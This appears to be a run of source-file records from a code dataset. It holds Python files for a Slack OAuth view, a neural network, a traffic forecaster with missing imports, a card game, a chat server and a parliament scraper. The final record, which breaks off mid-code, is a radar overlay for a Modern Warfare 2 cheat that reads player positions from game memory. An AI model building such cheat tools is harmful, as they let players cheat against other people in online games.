})\n data = response.json()\n\n account, created = SlackAccount.objects.update_or_create(\n user=request.user, team_id=data['team_id'], defaults={\n 'access_token': data['access_token'],\n 'scope': data['scope'],\n 'team_name': data['team_name'],\n 'incoming_webhook_url': data['incoming_webhook']['url'],\n 'incoming_webhook_channel': data['incoming_webhook']['channel'],\n 'incoming_webhook_configuration_url': (\n data['incoming_webhook']['configuration_url']),\n 'bot_user_id': data['bot']['bot_user_id'],\n 'bot_access_token': data['bot']['bot_access_token'],\n }\n )\n\n messages.success(request, \"Heatherr is now linked to %s.\" % (\n account.team_name,))\n return redirect(reverse('accounts:profile'))\n\n\nclass SlackAccountDetailView(DetailView):\n model = SlackAccount\n","sub_path":"heatherr/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486186676","text":"#coding=utf-8\nimport numpy as np\nimport scipy.io as sio\nimport math\n\n'''\nTODO\n用A跑regulardata 生成result116和118,116重新生成\nA1跑regulardata生成result121\n以及wforecast[0,2,5].npy\n\n'''\n\ndef get_database(w, timestamp, weekd, noweekd):\n\tfirst_timestamp = timestamp[0]\n\tsample_num = len(timestamp)\n\tdatabase = []\n\tfor i in range(48):\n\t\tdatabase.append([[],[]])\n\tdealed_sample = []\n\tfor i in range(sample_num-1):\n\t\thour = int((timestamp[i]-1475424000)/3600%24)\n\t\tweek = int(((timestamp[i]-1475424000)/3600/24+1)%7)\n\t\tif timestamp[i+1]-timestamp[i]==3600:\n\t\t\tif week in weekd:\n\t\t\t\tdatabase[hour][0].append(w[i])\n\t\t\t\tdatabase[hour][1].append(w[i+1])\n\t\t\tif week in noweekd:\n\t\t\t\tdatabase[hour+24][0].append(w[i])\n\t\t\t\tdatabase[hour+24][1].append(w[i+1])\n\tdatabase = np.array(database)\n\treturn database\n\ndef get_Least_squares_answer(A, Y):\n\treturn np.dot(np.dot((np.dot(A.T, A)).I, A.T), Y)\n\ndef del_col(dat,nozerocol):\n\tdat2 = np.zeros((dat.shape[0],len(nozerocol)))\n\tfor i in range(dat.shape[0]):\n\t\tfor j in range(len(nozerocol)):\n\t\t\tdat2[i][j] = dat[i][nozerocol[j]]\n\n\treturn dat2\n\ndef train(database, weekd, noweekd, k):\n\tTr = np.zeros((48,k,k))\n\tfor i in range(0,48):\n\t\tdbarray = np.array(database[i][0])\n\t\tzerocol = []\n\t\tnozerocol = []\n\t\tfor db1 in range(dbarray.shape[1]):\n\t\t\tshia = True\n\t\t\tfor db2 in range(dbarray.shape[0]):\n\t\t\t\tif dbarray[db2][db1]!=0:\n\t\t\t\t\tshia = False\n\t\t\tif shia:\n\t\t\t\tzerocol.append(db1)\n\t\t\telse:\n\t\t\t\tnozerocol.append(db1)\n\t\tdb = del_col(np.array(database[i][0]),nozerocol)\n\t\tdatabase[i][1] = del_col(np.array(database[i][1]),nozerocol)\n\t\tcount = 0\n\t\tfor j in range(db.shape[1]):\n\t\t\ty = []\n\t\t\tfor kl in range(database[i][1].shape[0]):\n\t\t\t\ty.append([database[i][1][kl][j]])\n\t\t\ty = np.mat(y)\n\t\t\tbeta = get_Least_squares_answer(np.mat(db),y)\n\t\t\tfor kl in range(db.shape[1]):\n\t\t\t\tTr[i][kl][nozerocol[j]] = beta[kl][0]\n\treturn Tr\n\n\ndef get_next_w(A,wone,tim,noweekd):\n\thour = int((tim-1475424000)/3600%24)\n\tweek = int(((tim-1475424000)/3600/24+1)%7)\n\tisnoweeked = 0\n\tif week in noweekd:\n\t\tisnoweeked = 24\n\treturn np.dot(wone,A[hour+isnoweeked])\n\ndef get_MAE(MA,True_MA):\n\tMAE = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tMAE += abs(True_MA[i]-MA[i])\n\tMAE = MAE / count\n\treturn MAE\n\ndef get_RMSE(MA,True_MA):\n\tRMSE = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tRMSE += math.pow(True_MA[i]-MA[i], 2)\n\tRMSE = math.sqrt(RMSE / count)\n\treturn RMSE\n\ndef get_ER(MA,True_MA):\n\tER = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tER += abs(True_MA[i]-MA[i])\n\tER = ER / np.sum(True_MA)\n\treturn ER\n\n\n\n\ndef test(A,w,H,testset,testtime,wnew, weekd, noweekd, timestamp):\n\tforcast_ = np.zeros((testset.shape[0],testset.shape[1]))\n\tMAE = 0\n\tRMSE = 0\n\tER = 0\n\tresult = []\n\tfor i in range(24):\n\t\thour = int((testtime[i]-1475424000)/3600%24)\n\t\tweek = int(((testtime[i]-1475424000)/3600/24+1)%7)\n\t\tisnoweeked = 0\n\t\tif week in noweekd:\n\t\t\tisnoweeked = 24\n\t\trealtime = testtime[i]\n\t\twhile realtime not in timestamp:\n\t\t\trealtime = realtime - 3600\n\t\ttimeres = (testtime[i] - realtime) / 3600\n\t\tWlast = w[np.where(timestamp==realtime)]\n\t\tfor j in range(1,int(timeres)+1):\n\t\t\tWlast = get_next_w(A,Wlast,realtime+j*3600,noweekd)\n\t\twnew.append(Wlast)\n\t\tWHlast = np.dot(Wlast,H)\n\t\tforcast_[i] = WHlast\t\t\n\t\tresult.append([get_MAE(forcast_[i],testset[i]),get_RMSE(forcast_[i],testset[i]),get_ER(forcast_[i],testset[i])])\n\t\tprint('MAE:', result[-1][0], 'RMSE:', result[-1][1], 'ER:', result[-1][2])\n\tresult = np.array(result)\n\treturn wnew\n\nif __name__ == '__main__':\n\tweekd = [1,2,3,4,5]\n\tnoweekd = [6,0]\n\ttimestamp = np.load(\"./traindata/traintime.npy\")\n\tfirst_timestamp = timestamp[0]\n\tsample_num = len(timestamp)\n\t# w=np.load('./W0.npy')\n\t# H=np.load('./H0.npy')\n\n\tw = hdf5storage.loadmat('./W1.mat')\n\tH = hdf5storage.loadmat('./H1.mat')\n\tw=w['S']\n\tH=H['B']\n\t#\n\tH = H.reshape(H.shape[0],-1)\n\tw = w.reshape(-1,w.shape[1])\n\t# print(w.min(),w.max(),w.mean(),w.std())\n\t# print(H.min(),H.max(),H.mean(),H.std())\n\tA=np.load('./A1.npy')\n\ttestset = np.load('./testdata_taxi/regulardata.npy')\n\tfirst_dim=testset.shape[0]\n\ttestset=testset.reshape(first_dim,-1)\n\ttesttime = np.load('./testdata_taxi/regulartime.npy')\n\twnew = []\n\ttest(A,w,testset,testtime)\n\twnew = np.array(wnew)\n\tnp.save('./testdata_taxi/wforecast5.npy',wnew)\n\n\n\n\n\n\n\n\n","sub_path":"Learn_transition_matrix.py","file_name":"Learn_transition_matrix.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52426065","text":"\n## Random State for Reproducibility\nRAND_STATE = 42\n\n#######################\n### Imports\n#######################\n\n## External Libraries\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import (load_digits,\n load_breast_cancer)\nfrom sklearn.preprocessing import LabelBinarizer\nimport matplotlib.pyplot as plt\n\n#######################\n### Helpers\n#######################\n\ndef plot_nn_performance(scorer,\n costs_train,\n costs_test,\n scores_train,\n scores_test):\n \"\"\"\n Plot Cost and Model Predictive Performance over Epochs\n\n Args:\n scorer (sklearn metrics function): Scoring passed to fit() method\n costs_train (list): Costs on training data\n costs_test (list): Costs on test data\n scores_train (list): Score on training data\n scores_test (list): Score on test data\n \n Returns:\n fig, ax (matplotlib objects): Figure\n \"\"\"\n ## Plot Performance\n fig, ax = plt.subplots(1, 2, figsize = (10, 5.8), sharex = True)\n for t, (tset, cost, score) in enumerate(zip([\"train\",\"test\"],\n [costs_train, costs_test],\n [scores_train, scores_test])):\n epochs = np.arange(len(cost))\n ax[0].plot(epochs, cost, label = tset, color = \"C{}\".format(t))\n ax[1].plot(epochs, score, label = tset, color = \"C{}\".format(t))\n ax[0].legend(loc = \"upper right\", frameon = True, facecolor = \"white\")\n ax[1].legend(loc = \"lower right\", frameon = True, facecolor = \"white\")\n for a in ax:\n a.set_xlabel(\"Training Epoch\", fontsize = 12)\n ax[0].set_ylabel(\"Cost\", fontsize = 12)\n ax[1].set_ylabel(scorer.__name__.replace(\"_\",\" \").title(), fontsize = 12)\n fig.tight_layout()\n return fig, ax\n\n#######################\n### Neural Network Class Definition\n#######################\n\nclass NeuralNetwork(object):\n\n def __init__(self,\n hidden_layers = [],\n max_epochs = 10000,\n lamb = 0.01,\n alpha = 1e-3,\n stopping_tol = 1e-10,\n random_state = None):\n \"\"\"\n Basic Implementation of a Neural Network\n\n Init Args:\n hidden_layers (list of int): Each index contains an integer representing the number of non-bias nodes.\n Default is [], which will do p nodes, where p is the number of input\n features\n max_epochs (int): Maximum number of training epochs\n lamb (float): Regularization parameter\n alpha (float): Learning rate for gradient descent\n stopping_tol (float): Minimum percent change in cost to keep training\n random_state (int or None): Choose a random seed\n \"\"\"\n ## Class Architecture and Hyperparameters\n self._hidden_layers = hidden_layers\n self._lb = None\n self._max_epochs = max_epochs\n self._lamb = lamb\n self._alpha = alpha\n self._stopping_tol = stopping_tol\n self._lb = None\n\n ## Parameters et al. Working Space\n self.s_ = None # Node sizes\n self.m = None # No. of Training Samples\n self.p = None # No. of features\n self.k = None # No. of output nodes (positive classes)\n self.theta_ = None # Weight matrices\n self.z_ = None # Weighted outputs\n self.a_ = None # Node activations\n self.d_ = None # Node errors\n self.D_ = None # Weighted Error\n self.theta_grad_ = None # Gradients for theta\n self.costs_ = None # Training Costs\n\n ## Set Random State\n if random_state is None:\n random_state = np.random.randint(1, int(1e6))\n np.random.seed(random_state)\n\n def _sigmoid(self,\n x,\n deriv = False):\n \"\"\"\n Sigmoid function, and its derivative\n\n Args:\n x (numeric or array): Input value(s)\n deriv (bool): If True, return x evaluated in the derivative of sigmoid. \n Otherwise, return x evaluated in the sigmoid itself\n \n Returns:\n out (numeric or array): Sigmoid or Derivative of Sigmoid applied to x\n \"\"\"\n if deriv:\n out = self._sigmoid(x) * (1 - self._sigmoid(x))\n else:\n out = 1 / (1 + np.exp(-x))\n return out\n\n def _compute_cost(self,\n h_x,\n y,\n gamma = 1e-10):\n \"\"\"\n Compute the cost, assuming sigmoid loss function\n\n Args:\n h_x (m x k array): Last layer, output probabilities (m samples, k classes)\n y (m x k array): True labels, one-hot encoded (m samples, k classes)\n gamma (float): Added to h_x to ensure no infs. Defualt is 1e-10\n \n Returns:\n cost (float): Cost value\n \"\"\"\n m = y.shape[0]\n cost = (1 / m) * ((-1) * y * np.log(h_x + gamma) - (1 - y)*np.log(1 - h_x + gamma)).sum() + \\\n (self._lamb / (2 * m)) * sum([np.square(t[:,1:]).sum() for t in self.theta_])\n return cost\n\n def _encode_y(self,\n y):\n \"\"\"\n Create a one-hot encoding of classification targets\n\n Args:\n y (array): Target classes, can already be one-hot encoded\n \n Returns:\n lb (sklearn LabelBinarizer): Transformer used to encode labels\n y_oh (2d-array): One-hot encoding of input labels\n \"\"\"\n ## Initalize Label Encoder\n lb = LabelBinarizer()\n ## Fit and Transform\n y_oh = lb.fit_transform(y)\n ## Return\n return lb, y_oh\n \n def _initialize_weights(self,\n X,\n y):\n \"\"\"\n Initialize Network Weights\n\n Args:\n X (array): Input feature matrix\n y (2d-array): One-hot encoding of target classes\n \n Returns:\n None (sets class parameters)\n \"\"\"\n ## Check Target Dimensionality\n if len(y.shape) == 1:\n raise ValueError(\"Expected y to be one-hot encoded target classes\")\n ## Dimensionality Preparation\n self.m, self.p = X.shape\n self.k = y.shape[1]\n if self.k == 2:\n self.k = self.k - 1\n if len(self._hidden_layers) == 0:\n self._hidden_layers = [p]\n self.s_ = [self.p] + self._hidden_layers + [self.k]\n ## Initialize Weights, breaking Symmetry\n self.theta_ = []\n for s_j, s_j1 in zip(self.s_[:-1],self.s_[1:]):\n s_dim = (s_j1, s_j + 1)\n s_eps = np.sqrt(6) / np.sqrt(s_dim[0] + s_dim[1])\n theta_s = (2 * np.random.random(size = s_dim) * s_eps) - s_eps\n self.theta_.append(theta_s) \n\n def _forward_propagation(self,\n X):\n \"\"\"\n Perform forward propagation using the current set of network weights self.theta_\n\n Args:\n X (2d-array): Feature matrix\n \n Returns:\n z_ (list of array): Weighted sums for layer\n a_ (list of array): Activations, with additional bias unit \n \"\"\"\n ## Sample Size\n m = X.shape[0]\n ## Set Activation Caches\n z_ = []\n a_ = []\n ## Initialize \n a_.append(np.hstack([np.ones((m, 1)), X]))\n ## Propagate Values\n for l, theta_l in enumerate(self.theta_):\n z_l = np.matmul(theta_l, a_[-1].T).T\n a_l = self._sigmoid(z_l)\n if l != len(self.theta_) - 1:\n a_l = np.hstack([np.ones((m, 1)), a_l])\n z_.append(z_l)\n a_.append(a_l)\n return z_, a_\n \n def _back_propagation(self,\n z_,\n a_,\n y):\n \"\"\"\n Perform backpropagation\n\n Args:\n z_ (list of array): Weighted sums at each layer pre-activation (excludes bias term)\n a_ (list of array): Activations at each layer (inclues bias term)\n y (2d-array): One-hot encoded true classes\n \n Returns:\n d_ (list of array): error terms\n D_ (list of array): partial derivatives, weighted by sample size\n theta_grad_ (list of array): gradients for each weight matrix \n \"\"\"\n ## Set Cache\n d_ = []\n D_ = []\n theta_grad_ = []\n ## Intialize\n d_.append(a_[-1] - y)\n ## Compute deltas\n for theta_l, z_l in zip(self.theta_[::-1][:-1], z_[::-1][1:]):\n d_l = np.matmul(theta_l[:, 1:].T, d_[-1].T).T * self._sigmoid(z_l, True)\n d_.append(d_l)\n ## Compute Deltas\n for d_l, a_l in zip(d_[::-1], a_[:-1]):\n D_l = np.matmul(d_l.T, a_l)\n D_.append(D_l)\n ## Compute Gradients\n def add_regularization(theta,\n m):\n \"\"\"\n Add Regularization to Gradient, Ignoring Bias Params\n\n Args:\n theta (2d-array): Weight Matrix\n m (int): Number of samples\n \n Returns:\n regularizer * theta (2d-array): Regularized weights (ignoring bias)\n \"\"\"\n regularizer = np.ones((theta.shape[1], 1, ))\n regularizer[0, 0] = 0\n regularizer *= (self._lamb/m)\n return np.multiply(regularizer, theta.T).T\n for D_l, theta_l in zip(D_, self.theta_):\n theta_l_grad = (1/self.m) * D_l + add_regularization(theta_l, self.m)\n theta_grad_.append(theta_l_grad)\n ## Return\n return d_, D_, theta_grad_\n\n def fit(self,\n X,\n y,\n X_validation = None,\n y_validation = None,\n scorer = metrics.accuracy_score):\n \"\"\"\n Fit a neural network using backpropagation and gradient descent.\n \n Note: If passing a roc_auc_score for scorer and performing multi-class classification,\n performance cache will contain class-level AUC scores at each epoch\n\n Args:\n X (2d-array): Feature Matrix\n y (array): Target classes\n \n Returns:\n self.costs_ (list): Cost computed at each training epoch\n scores (list): Model performance as a function of scorer at each training epoch\n costs_validation (list): Cost for validation dataset if passed, at each training epoch\n scores_validation (list): Model performance on validation dataset as a function of scorer\n at each training epoch\n \"\"\"\n ## One Hot Encoding of Y\n self._lb, y = self._encode_y(y)\n ## Initialize Weights\n self._initialize_weights(X, y)\n ## Model Performance\n self.costs_ = []\n scores = []\n costs_validation = []\n scores_validation = []\n ## Gradient Descent\n for e in tqdm(range(self._max_epochs),\n total = self._max_epochs,\n desc = \"Gradient Descent Epoch\",\n leave = True,\n position = 0):\n ## Forward Propagation\n self.z_, self.a_ = self._forward_propagation(X)\n ## Compute Costs and Other Performance Measures\n self.costs_.append(self._compute_cost(h_x = self.a_[-1], y = y))\n if scorer.__name__ != \"roc_auc_score\":\n scores.append(scorer(self._lb.inverse_transform(y), self.predict(X)))\n else:\n if self.k == 1:\n scores.append(scorer(self._lb.inverse_transform(y), self.predict_proba(X)))\n else:\n h_x_train = self.predict_proba(X)\n scores.append([scorer(y[:,i], h_x_train[:,i]) for i in range(y.shape[1])])\n if X_validation is not None and y_validation is not None:\n costs_validation.append(self._compute_cost(h_x = self.predict_proba(X_validation),\n y = self._lb.transform(y_validation)))\n if scorer.__name__ != \"roc_auc_score\":\n scores_validation.append(scorer(y_validation, self.predict(X_validation)))\n else:\n if self.k == 1:\n scores_validation.append(scorer(y_validation, self.predict_proba(X_validation)))\n else:\n h_x_validation = self.predict_proba(X_validation)\n scores_validation.append([scorer(self._lb.transform(y_validation)[:,i],\n h_x_validation[:,i]) for i in range(y.shape[1])])\n\n ## Check Stopping Criteria\n if e > 0 and ((self.costs_[-2] - self.costs_[-1])/self.costs_[-2]) < self._stopping_tol:\n print(\"Stopping Critera Reached. Breaking at Epoch {}\".format(e+1))\n break\n ## Backpropagation\n self.d_, self.D_, self.theta_grad_ = self._back_propagation(z_ = self.z_,\n a_ = self.a_,\n y = y)\n ## Update Theta (Gradient Descent Step)\n for l in range(len(self.theta_)):\n self.theta_[l] = self.theta_[l] - self._alpha * self.theta_grad_[l]\n return self.costs_, scores, costs_validation, scores_validation\n \n def predict_proba(self,\n X):\n \"\"\"\n Make probability predictions\n\n Args:\n X (2d-array): Feature Matrix\n \n Returns:\n h_x (2d-array): Output probabilities, last layer of network\n \"\"\"\n ## Check that the network has been fit\n if self.theta_ is None:\n raise ValueErrror(\"Network has not been fit yet. Please call .fit() method first.\")\n ## Check that feature matrix dimensionality matches expected shape\n if X.shape[1] + 1 != self.theta_[0].shape[1]:\n raise ValueError(\"Expected {} features. Received {} in X.\".format(self.theta_[0].shape[1] - 1,\n X.shape[1]))\n ## Apply Forward Propagation\n z_, a_ = self._forward_propagation(X)\n h_x = a_[-1]\n if self.k > 1:\n h_x = h_x / h_x.sum(axis = 1, keepdims = True)\n return h_x\n\n def predict(self,\n X):\n \"\"\"\n Make classifications\n\n Args:\n X (2d-array): Feature Matrix\n \n Returns:\n h_x_argmax (1d-array): Class predictions, argmax of hypothesis\n \"\"\"\n ## Make Probability Predictions\n h_x = self.predict_proba(X)\n ## Get Classes (De-coded)\n if self.k != 1:\n h_x_argmax = self._lb.classes_[np.argmax(h_x, axis = 1)]\n else:\n h_x_argmax = (h_x >= 0.5).astype(int)\n return h_x_argmax\n\n#######################\n### Example 1: Binary\n#######################\n\ndef train_binary_nn():\n \"\"\"\n Train a binary classification model (breast cancer prediction)\n \"\"\"\n ## Load Cancer Dataset\n X, y = load_breast_cancer(return_X_y = True)\n ## Split Data Set\n X_train, X_test, y_train, y_test = train_test_split(X,\n y,\n test_size = 0.3,\n random_state = RAND_STATE)\n ## Initialize and Parameterize Neural Network\n nn_binary = NeuralNetwork(hidden_layers = [30],\n max_epochs = 10000,\n lamb = 0.01,\n alpha = 1e-4,\n stopping_tol = 1e-15,\n random_state = RAND_STATE)\n ## Fit Model\n scorer = metrics.accuracy_score\n costs_train, scores_train, costs_test, scores_test = nn_binary.fit(X = X_train,\n y = y_train,\n X_validation = X_test,\n y_validation = y_test,\n scorer = scorer)\n ## Plot Performance\n fig, ax = plot_nn_performance(scorer,\n costs_train,\n costs_test,\n scores_train,\n scores_test)\n plt.show()\n\n#######################\n### Example 2: Multi-class\n#######################\n\ndef train_multiclass_nn():\n \"\"\"\n Train a multi-class model (handwriting digit recognition)\n \"\"\"\n ## Load Digit Dataset\n X, y = load_digits(n_class = 10,\n return_X_y = True)\n ## Split Data Set\n X_train, X_test, y_train, y_test = train_test_split(X,\n y,\n test_size = 0.3,\n random_state = RAND_STATE)\n ## Initialize and Parameterize Neural Network\n nn_multi = NeuralNetwork(hidden_layers = [100, 25],\n max_epochs = 10000,\n lamb = 0.01,\n alpha = 1e-3,\n stopping_tol = 1e-5,\n random_state = RAND_STATE)\n ## Fit Model\n scorer = metrics.accuracy_score\n costs_train, scores_train, costs_test, scores_test = nn_multi.fit(X = X_train,\n y = y_train,\n X_validation = X_test,\n y_validation = y_test,\n scorer = scorer)\n ## Plot Performance\n fig, ax = plot_nn_performance(scorer,\n costs_test,\n costs_test,\n scores_train,\n scores_test)\n plt.show()\n\n#######################\n### Executable Program\n#######################\n\ndef main():\n \"\"\"\n Executable Program\n \"\"\"\n ## Example 1: Binary\n print(\"Training Binary Neural Network on Breast Cancer Dataset\")\n train_binary_nn()\n ## Example 2: Multi-class\n print(\"Training Multi-class Neural Network on Digit Dataset\")\n train_multiclass_nn()\n\nif __name__ == \"__main__\":\n main()","sub_path":"week-4-5/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":19116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401564638","text":"import simpy\n\nfrom src.car_model import Car, Driver, car\n\nenv = simpy.Environment()\n# car = Car(\"Ferrari\", env)\n# driver = Driver(env, car)\n\ncharge_station = simpy.Resource(env, capacity=2)\nfor i in range(4):\n env.process(car('Car {}'.format(i), env, charge_station, i * 2, 5))\n\nenv.run(until=15)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"77426415","text":"from flask_wtf import FlaskForm\nfrom wtforms.fields import (\n StringField,\n SelectField,\n)\nfrom wtforms.validators import (\n InputRequired,\n Length,\n ValidationError,\n)\n\n\nclass StatusForm(FlaskForm):\n content = StringField(\n validators=[\n InputRequired(message=''),\n Length(max=140, message='你的输入超出140个字符上限~'),\n ],\n )\n\n is_public = SelectField(\n choices=[\n (1, '所有人可见'),\n (0, '仅自己可见'),\n ],\n coerce=lambda x: bool(int(x)),\n default=1,\n )\n\n def validate_content(self, content):\n if not content.data.strip():\n raise ValidationError('你输入的内容为空')\n","sub_path":"timeline/forms/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"272868178","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\nfrom fool_game import Cards,Player,Robot,Game\n\nresult = ''\nwinner = ''\ngame_run = 'y'\ncardg = []\nplayer_name = input(\"Введи своє ім'я:\").capitalize()\n\ni = 0\nwhile not player_name.isalpha():\n player_name = input(\"Введи людське ім'я:\").capitalize()\n if player_name.isalpha():\n print(\"Привіт, %s =)\" % player_name)\n break\n if i == 2:\n print(\"OK!Нехай, привіт %s =)\" % player_name)\n break\n i += 1\n\ndeck_game = Cards()\n\nwhile game_run == 'y':\n print(\"Ок!Поїхали %s\" % player_name)\n sleep(2)\n ######## Start ########\n # shuffle deck\n deck = deck_game.shuffle_deck()\n # make trump\n trump = deck_game.make_trump()\n # distribute cards for play's and take cards from table\n cards_player, cards_robot = deck_game.give_cards()\n # define players\n player = Player(deck,cards_player,trump)\n robot = Robot(deck,cards_robot,trump)\n # player see cards and table\n player.see_cards(deck,cards_player,trump)\n # determine younger trump\n trump_pla = player.see_trump(cards_player,trump)\n trump_rob = robot.see_trump(cards_robot,trump)\n # determine whose first step\n gamgam = Game(trump_pla,trump_rob,trump)\n step_player, step_robot = gamgam.trumping(trump_pla,trump_rob,trump)\n\n while len(cards_robot) > 0 and len(cards_player) > 0:\n if step_robot:\n cardg, cards_robot = robot.attack(cards_robot,trump)\n result, cards_player = player.defence(cardg,cards_player,trump)\n if result == 'beat' or result == 'beat_trump':\n step_robot = False\n step_player = True\n sleep(2)\n elif result == 'take':\n sleep(2)\n else:\n cardg, cards_player = player.attack(cards_player,trump)\n result, cards_robot = robot.defence(cardg,cards_robot,trump)\n if result == 'beat' or result == 'beat_trump':\n step_robot = True\n step_player = False\n sleep(2)\n elif result == 'take':\n print(\"Холєра!Я забираю..\")\n sleep(2)\n\n if len(deck) > 0:\n if step_player:\n cards_robot,deck = deck_game.take_card(cards_robot,deck)\n cards_player,deck = deck_game.take_card(cards_player,deck)\n else:\n cards_player,deck = deck_game.take_card(cards_player,deck)\n cards_robot,deck = deck_game.take_card(cards_robot,deck)\n cards_robot.sort()\n cards_player.sort()\n\n if len(cards_robot) > 0 and len(cards_player) > 0:\n player.see_cards(deck,cards_player,trump)\n elif len(cards_robot) == 0 and len(cards_player) == 0:\n winner = 'NO'\n break\n elif len(cards_robot) > 0 and len(cards_player) == 0:\n winner = 'You'\n break\n elif len(cards_robot) == 0 and len(cards_player) > 0:\n winner = 'Me'\n break\n\n if winner == 'Me':\n game_run = input(\"Я виграв! Граємо далі? 'y'/'n':\")\n elif winner == 'You':\n game_run = input(\"Вітаю %s!Ти виграв, граємо далі? 'y'/'n':\" % player_name)\n elif winner == 'NO':\n game_run = input(\"Нічия!!! Граємо далі? 'y'/'n':\")\n\n if game_run.lower() != 'y' and game_run.lower() != 'n':\n game_run = 'y'\n elif game_run.lower() == 'n':\n print(\"Па-па, дякую за гру!\")\n","sub_path":"cards_classes/fool_start.py","file_name":"fool_start.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"625140884","text":"import asyncio\r\n\r\nclass Server(asyncio.Protocol):\r\n\r\n connections = {}\r\n\r\n @staticmethod\r\n def broadcast(data: bytes, user: str) -> None:\r\n for key in Server.connections.keys():\r\n if key != user:\r\n Server.connections[key].write(data)\r\n\r\n def __init__(self):\r\n self.user = None\r\n\r\n def connection_made(self, transport: asyncio.transports.BaseTransport) -> None:\r\n self.user = transport.get_extra_info('peername')[0] + str(transport.get_extra_info('peername')[1])\r\n Server.connections[self.user] = transport\r\n\r\n def data_received(self, data: bytes) -> None:\r\n if ':exit' in data.decode():\r\n Server.connections[self.user].close()\r\n Server.connections.pop(self.user)\r\n else:\r\n Server.broadcast(data, self.user)\r\n\r\n\r\nasync def main():\r\n loop = asyncio.get_running_loop()\r\n server = await loop.create_server(lambda: Server(), '127.0.0.1', 8888)\r\n\r\n async with server:\r\n await server.serve_forever()\r\n\r\n\r\nif __name__ == '__main__':\r\n asyncio.run(main())\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"489887415","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\ndef get_politician(party_id):\n url = \"http://www.assembly.go.kr/assm/memact/congressman/memCond/memCondListAjax.do\"\n value = {\n 's_poly_cd' : party_id,\n 'rowPerPage' : 300}\n data = urllib.parse.urlencode(value)\n full_url = url + '?' + data\n\n response = requests.get(full_url)\n\n if response.encoding is None:\n response.encoding = 'utf-8'\n\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n\n if response.encoding is None: # 인코딩은 get(url)한 데이터를 해야함\n response.encoding = 'utf-8'\n\n for idx, politician in enumerate(soup.select('.memberna_list dl')):\n pol_list = []\n name = politician.dt.a.text\n image_url = politician.dd.a.img.get('src')\n pol_id = image_url.split('/')[2].split('.')[0]\n\n # pol_list.append(name)\n # pol_list.append(image_url)\n # pol_list.append(pol_id)\n # print(pol_list)\n\n print(idx, name, \"국회\", \"국회의원\", pol_id)\n\n # for info in soup.select('.mt'):\n # mt = info.text\n # print(mt)\n # break\n #\n # for info in soup.select('.ht'):\n # ht = info.text\n # print(ht)\n # break\n\nget_politician(101030)\n# 더민주 - 101182\n# 자유한국 - 101186\n# 국민의당 - 101183\n# 바른정당 - 101031\n# 정의당 - 101180\n# 무소속 - 101030\n","sub_path":"update_politician_list.py","file_name":"update_politician_list.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611093919","text":"def bordered(text):\n text = text.splitlines()\n maxlen = max(len(s) for s in text)\n colwidth = maxlen + 2\n res = \"\"\n res += '+' + '-'*colwidth + '+\\n'\n for s in text:\n res += '| %-*.*s |' % (maxlen, maxlen, s) + \"\\n\"\n res += '+' + '-'*colwidth + '+\\n'\n return res\n","sub_path":"recipes/Libraries/longy/prettyConsole.py","file_name":"prettyConsole.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"448683415","text":"from structs import VECTOR, ET_PLAYER, ET_TURRET, ET_HELICOPTER, ET_PLANE, ET_EXPLOSIVE, ALIVE_FLAG\r\nfrom Config import * #@UnusedWildImport\r\nfrom utils import draw_arrow, draw4\r\nfrom Keys import keys\r\nfrom math import radians\r\nfrom ctypes import byref, c_float\r\nfrom directx.d3d import D3DRECT, D3DCLEAR, RECT\r\nfrom directx.d3dx import d3dxdll, D3DXVECTOR2, D3DMATRIX\r\n\r\n\r\nclass Radar(object):\r\n \r\n def __init__(self, env):\r\n self.env = env\r\n self.rx = 0\r\n self.ry = 0\r\n self.rh = 0\r\n self.rw = 0\r\n \r\n def render(self):\r\n read_game = self.env.read_game\r\n frame = self.env.frame\r\n textures = self.env.textures\r\n\r\n if not read_game.is_in_game or not keys[\"KEY_RADAR\"]: return\r\n \r\n rx = self.rx = int(read_game.resolution_x/2 - RADAR_SIZE/2 + RADAR_CENTER_X)\r\n ry = self.ry = RADAR_OFFSET\r\n rh = rw = self.rh = self.rw = RADAR_SIZE\r\n \r\n scaling = 0.5 # TODO\r\n \r\n pos = read_game.mw2_mypos\r\n \r\n map_name = read_game.map_name # name of the current map\r\n p_matrix = textures.matrix[map_name] # transformation matrix (scale + rotation)\r\n transl = textures.translations[map_name] # translation vector to correct with map origin\r\n map_pos = VECTOR() # contains the coord on the map (with applied scaling)\r\n map_pos.x = scaling * (transl[0] + p_matrix[0]*pos.x + p_matrix[1]*pos.y)\r\n map_pos.y = scaling * (transl[1] + p_matrix[2]*pos.x + p_matrix[3]*pos.y)\r\n arrow_angle = textures.angle[map_name] # offset to apply to angles (only in 